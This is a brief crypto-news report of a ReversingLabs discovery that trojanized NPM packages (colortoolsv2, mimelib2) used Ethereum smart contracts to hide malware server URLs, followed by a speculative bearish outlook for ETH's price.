Hackers Use Ethereum Smart Contracts to Hide Malware in NPM
ReversingLabs researchers have uncovered a novel supply-chain malware campaign that uses Ethereum smart contracts to conceal malicious payload URLs, bypassing traditional security scans.
Attackers published two trojanized NPM packages—colortoolsv2 and mimelib2—disguised as Solana and Hyperliquid trading bots on GitHub. Once installed, these packages query specific Ethereum smart contracts on-chain to retrieve command-and-control server details for second-stage malware. Attributed to Stargazer’s Ghost Network, the operation relied on fake GitHub accounts, inflated stars, automated commits and rotating dependencies across new repositories to evade detection. This advanced exploitation of smart contract functionality highlights critical risks in blockchain-based supply chains and NPM package security, underlining the need for rigorous open-source library vetting, continuous GitHub metric monitoring and enhanced blockchain security practices.
Bearish
This campaign’s abuse of Ethereum smart contracts to hide malware URLs represents a significant security threat that can undermine confidence among developers and investors. In the short term, traders may adopt a risk-off stance towards ETH, increasing volatility as projects and users evaluate their security posture. Over the longer term, strengthened security measures and improved library vetting could mitigate risks, but the immediate sentiment impact is mutedly bearish for Ethereum’s price.